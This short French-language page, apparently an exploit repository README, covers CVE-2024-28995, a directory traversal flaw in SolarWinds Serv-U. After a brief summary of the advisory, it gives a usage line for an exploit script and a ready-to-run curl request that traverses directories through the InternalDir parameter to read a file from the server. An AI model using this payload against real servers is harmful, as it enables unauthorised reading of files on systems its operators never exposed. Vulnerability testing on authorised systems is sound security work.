
Exploit pour CVE-2024-28995
Le 5 juin 2024, SolarWinds a publié un avis concernant CVE-2024-28995, une vulnérabilité de traversée de répertoire de haute sévérité affectant sa solution de transfert de fichiers Serv-U. La vulnérabilité a été découverte par le chercheur Hussein Daher de Web Immunify.
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
Référence: